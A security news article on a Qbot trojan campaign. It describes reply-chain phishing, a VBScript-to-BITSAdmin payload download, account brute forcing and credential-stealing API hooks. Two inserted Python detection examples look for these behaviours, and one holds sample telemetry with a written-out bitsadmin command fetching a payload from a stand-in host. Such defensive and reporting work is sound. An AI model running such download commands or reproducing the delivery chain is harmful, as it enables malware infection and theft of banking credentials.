Latest Qbot Variant Evades Detection, Infects Thousands


Ever-changing Qbot trojan has been spotted in a fresh campaign with a new “context aware” delivery technique.

Qbot, an information-stealing trojan that has been around for 10 years, has resurfaced with a new phishing-based infection technique that is able to evade anti-spam defenses.

Varonis Security Research spotted the fresh global Qbot campaign in March. Researchers said they have positively identified 2,726 victims, based on an analysis of one of the attacker’s servers. However, they suspect the actual number of victims is much higher. Researchers at JASK meanwhile on Tuesday released further analysis of the latest iteration of the Qbot malware.

Qbot, also known as QakBot, is known for its polymorphic behavior and its worm-like tendencies, such as being able to self-replicate via shared drives and removable media. This time around, Qbot has been spreading through a phishing campaign targeting U.S. corporations and also victims in Europe, Asia and South America.

The delivery mechanism for this variant of Qbot is via phishing campaigns, where victims receive an email containing a link to what appears to be an online document. The email purports to be part of an existing email thread, under the guise of replying to a pre-existing business correspondence, according to JASK.

“This email was not blocked by an anti-spam gateway. It was a context-aware targeted response to an existing email thread,” wrote Greg Longo, senior threat analyst with JASK, in an email-based interview. He said that the goal of the attacks is to steal proprietary financial information, including bank-account credentials.

The infection technique is typical. A phishing email arrives with a link to a Microsoft OneDrive file that delivers a Microsoft Visual Basic Scripting Edition (VBScript) file in a compressed ZIP archive. If the archive is opened, the attack spawns the legitimate BITSAdmin Windows utility. That triggers another native Windows utility, Wscript.exe, which is used to download the Qbot malware file “august.png” from the attacker’s server.

“This two-stage process is a common attack vector for actors, used to bypass security controls. Some security technologies will detonate links in an email, so including a link to a ZIP archive is likely to get through (as opposed to a link straight to the malware),” Longo wrote.

Varonis Security Research noted that previous Qbot attacks have utilized malicious Word document macros as a stage-one step in attacks. Varonis researchers also noted that this variant is unique in that the malware uses BITSAdmin to download the loader. This appears to be a new behavior, as previous samples used PowerShell. According to a Microsoft description, “BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.”
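The delivery chain described above (a script host run from an extracted archive, then BITSAdmin fetching a payload from a remote URL) is visible in ordinary process-creation telemetry. The following is an added detection example, not code from the article or from the Varonis or JASK researchers; it runs over constructed Sysmon-style process-creation records, and the field names, sample paths and the example.invalid host are assumptions.

```python
"""Added example (not from the article or the researchers it cites): flag the
two-stage delivery chain (script host from a user-writable directory, then
bitsadmin.exe transferring a file from a URL) in process-creation telemetry.
Field layout and all sample values are constructed assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Locations a user can write to without elevation; an extracted ZIP lands here.
USER_DIR_RE = re.compile(r"\\(temp|downloads|appdata)\\")


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the newly created process
    command_line: str
    parent_image: str   # full path of the parent process


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the detection labels that apply to one process-creation event."""
    hits: List[str] = []
    img, parent = _basename(ev.image), _basename(ev.parent_image)
    cmd = ev.command_line.lower()
    # Stage 1: a script host started with a script under a user-writable path.
    if img in SCRIPT_HOSTS and USER_DIR_RE.search(cmd):
        hits.append("script_host_from_user_dir")
    # Stage 2: bitsadmin used to transfer a file; escalate when the source is a
    # remote URL and when the parent is a script host.
    if img == "bitsadmin.exe" and "/transfer" in cmd:
        hits.append("bitsadmin_transfer")
        if URL_RE.search(ev.command_line):
            hits.append("bitsadmin_remote_url")
        if parent in SCRIPT_HOSTS:
            hits.append("bitsadmin_child_of_script_host")
    return hits


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> labels for every event that triggered at least one label."""
    findings: Dict[int, List[str]] = {}
    for ev in events:
        labels = classify(ev)
        if labels:
            findings[ev.pid] = labels
    return findings


# Constructed sample telemetry: one benign shell, the two attack stages, and a
# benign administrative bitsadmin invocation that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Windows\System32\userinit.exe"),
    ProcEvent(101, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Temp1_doc.zip\doc.vbs"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(102, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer job /download /priority high "
              r"http://example.invalid/august.png C:\Users\alice\AppData\Local\Temp\august.png",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(103, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /list /allusers", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, labels in scan(SAMPLE_EVENTS).items():
        print(pid, labels)
```

The parent-child check is the strongest signal here: BITSAdmin has legitimate administrative uses, but a script host handing it a remote URL matches the chain the researchers describe and is rare in normal operation.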

Figure: Latest Qbot Variant Evades Anti-Spam Gateways

Post-infection, according to Varonis, “[if] the malware compromises a domain account, it enumerates the ‘Domain Users’ group and brute-forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.”
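The enumeration-then-brute-force step described above leaves a distinctive trace in Windows Security logs: a single source host failing logons against many different accounts in a short time, as opposed to one user mistyping one password. The following is an added detection example, not code from the article or from Varonis; it counts failed-logon events (Event ID 4625) per source workstation over a sliding window, and the pipe-delimited export format, host names, user names and thresholds are constructed assumptions.

```python
"""Added example (not from the article or Varonis): flag one source host
failing logons against many distinct accounts within a short window, the
shape of the 'Domain Users' brute force described above. The log export
format and all sample values are constructed assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class FailedLogon(NamedTuple):
    time: datetime
    workstation: str    # host the attempt came from
    target_user: str    # account that was tried


def parse_4625(line: str) -> FailedLogon:
    """Parse a constructed export line: '<ISO time>|4625|<workstation>|<user>'."""
    ts, event_id, host, user = line.strip().split("|")
    if event_id != "4625":
        raise ValueError("not a failed-logon event: " + line)
    return FailedLogon(datetime.fromisoformat(ts), host, user)


def detect_account_spray(events: List[FailedLogon],
                         window: timedelta = timedelta(minutes=5),
                         min_distinct_users: int = 10) -> Dict[str, int]:
    """Return {workstation: max distinct target accounts seen within one window}
    for every source that fails against at least min_distinct_users accounts.
    Many accounts from one host is the enumeration pattern; many failures
    against one account is ordinary guessing and is deliberately not flagged."""
    by_host: Dict[str, List[FailedLogon]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.time):
        by_host[ev.workstation].append(ev)

    alerts: Dict[str, int] = {}
    for host, evs in by_host.items():
        start = 0
        for end in range(len(evs)):
            # advance the window start until it spans at most `window`
            while evs[end].time - evs[start].time > window:
                start += 1
            users = {e.target_user for e in evs[start:end + 1]}
            if len(users) >= min_distinct_users:
                alerts[host] = max(len(users), alerts.get(host, 0))
    return alerts


# Constructed sample log: WS01 walks through twelve accounts in under two
# minutes; WS02 is one user failing five times over twenty minutes.
_BASE = datetime(2019, 4, 1, 9, 0, 0)
SAMPLE_LOG = [
    f"{(_BASE + timedelta(seconds=10 * i)).isoformat()}|4625|WS01|user{i:03d}"
    for i in range(12)
] + [
    f"{(_BASE + timedelta(minutes=4 * i)).isoformat()}|4625|WS02|bob"
    for i in range(5)
]


def run_sample() -> Dict[str, int]:
    return detect_account_spray([parse_4625(line) for line in SAMPLE_LOG])


if __name__ == "__main__":
    print(run_sample())
```

The distinct-account threshold also matches the 2017 behavior the article mentions later, where the trojan cycled through credentials until Active Directory accounts locked out; a lockout storm is the late symptom, while this count fires while the enumeration is still in progress.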

The goal of the malware is to siphon money from user accounts via stealing credentials. Techniques and tools used include keylogging to steal credentials/cookies, and the use of hooking. Hooking is where “the main payload injects … all the processes in the system with a code that hooks API calls and searches for financial/banking strings. The malware extracts the data, credentials or session cookies from the process and uploads it to the attacker,” Varonis wrote.

Since 2009, when Qbot launched its first assault on computer networks, the malware has never completely vanished. Since then, there have been ongoing but sporadic reports of Qbot infections and variants causing limited infections. In 2016, the criminals behind the trojan repurposed the original Qbot source code and tweaked it with the ability to regenerate itself on an infected host every 24 hours. The malware was also spotted in 2017 with a new tactic of locking users out of their Active Directory accounts, by tying up systems via cycling through user and domain credentials in a dictionary attack.
